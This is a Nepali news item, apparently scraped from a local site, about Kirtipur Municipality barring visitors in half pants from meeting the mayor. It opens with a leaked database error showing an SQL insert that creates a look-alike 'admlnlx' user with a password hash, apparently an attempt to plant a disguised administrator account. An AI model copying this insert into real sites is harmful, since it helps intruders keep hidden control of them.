WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BwC3Wm/1HXUt5BK5ltgXLEiwJa8JkL/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 03:47:13', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, १० भदौ, काठमाडौं । कीर्तिपुर नगरपालिकाले कार्यालय समयमा हाफ पाइन्ट लगाएर मेयर र उपमेयरलाई भेट्न रोक लगाएको छ ।
नगरपालिकाले सूचना प्रकाशन गर्दै सो कुरा जनाएको छ । भेटघाटलाई शिष्ट बनाउन औपचारिक पोशाकमा आउन आग्रह गरिएको मेयर रमेश महर्जनले बताए । ‘हाफ पाइन्ट पनि अब के भन्ने … साह्रै अनौपचारिक ड्रेसमा आउन थालेपछि सूचना निकालेका हौं’ उनले भने, ‘यो सूचनापछि हिजो हाफ पाइन्ट लगाएर आउनेहरु पनि फुल पाइन्टमा आउन थाल्नु भएको छ ।’
मेयरले भेटघाटलाई शिष्ट मात्र बनाउन खोजेको र कीर्तिपुरबासी खुसी रहेको बताए तर सलाई लिएर सामाजिक सञ्जालमा मात्र हंगामा भएको उनको भनाइ छ ।
sourse:onlinekhabar